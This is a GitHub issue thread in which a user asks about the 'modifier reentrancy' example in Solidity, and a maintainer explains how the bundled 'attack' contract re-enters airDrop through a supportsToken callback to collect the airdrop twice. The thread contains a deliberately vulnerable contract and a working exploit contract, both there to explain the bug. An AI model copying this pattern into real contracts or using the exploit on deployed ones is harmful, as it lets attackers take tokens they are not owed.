### ISSUE TITLE
what is the scenario in modifier reentrancy?

### ISSUE THREAD

**Issue by BuggerBag** [ConsenSys/mythril#1589]
Hi, I read the issue on this page https://github.com/ConsenSys/mythril/issues/691
So, can anyone tell me, what is the problem in ModifierEntrancy? (what is the scenario, the attacker get extra token or something like this?)
what does this sentence means "Bank(msg.sender).supportsToken()"? I test this code with hardhat but hardhat can't recognize Bank(msg.sender).
thanks alot
```solidity
pragma solidity ^0.4.24;

contract ModifierEntrancy {
  mapping (address => uint) public tokenBalance;
  string constant name = "Nu Token";

  //If a contract has a zero balance and supports the token give them some token
  function airDrop() hasNoBalance supportsToken  public{
    tokenBalance[msg.sender] += 20;
  }

  //Checks that the contract responds the way we want
  modifier supportsToken() {
    require(keccak256(abi.encodePacked("Nu Token")) == Bank(msg.sender).supportsToken());
    _;
  }
  //Checks that the caller has a zero balance
  modifier hasNoBalance {
      require(tokenBalance[msg.sender] == 0);
      _;
  }
}

contract Bank{
    function supportsToken() external pure returns(bytes32){
        return(keccak256(abi.encodePacked("Nu Token")));
    }
}

contract attack{ //An example of a contract that breaks the contract above.
    bool hasBeenCalled;
    function supportsToken() external returns(bytes32){
        if(!hasBeenCalled){
            hasBeenCalled = true;
            ModifierEntrancy(msg.sender).airDrop();
        }
        return(keccak256(abi.encodePacked("Nu Token")));
    }
    function call(address token) public{
        ModifierEntrancy(token).airDrop();
    }
}
```

**Comment by norhh** [comment]
You get twice the tokens.
If attacker contract calls the ModifierEntrancy.airdrop(), which calls the supportsToken(), then to Bank(msg.sender).supportsToken() which is attack.supportsToken(). attack.supportssToken() calls for ModifierEntrancy(msg.sender).airDrop() again. So there will be two airdrop calls in the recursive stack that has passed the NoBalance() modifier checks.

**Comment by BuggerBag** [comment]
yes, your right
msg.sender is ```attack``` contract, So in this context ```Bank(msg.sender).supportsToken()```, Bank has delegation to callee, am i right?

**Comment by norhh** [comment]
So the execution goes straight to the attack's `supportsToken()`

**Comment by BuggerBag** [comment]
thank you.
I'm writting ... for explain more

**Comment by BuggerBag** [comment]
SWC has very bad writting and some part are very confusing.
your right, the ```Bank(msg.sender)``` in somehow is interface, msg.sender must follow the adaptee interface, So attacker create attack function with ```supportsToken()``` for getting adaptation, at next the delegation has been run and attacker calling the ```supportsToken()``` and then ModifierEntrancy.airDrop() has been called again.
I used remix IDE also, for getting test. but remix can't handle the ```Bank(msg.sender)```!

**Comment by BuggerBag** [comment]
So, at now, I close this issue.
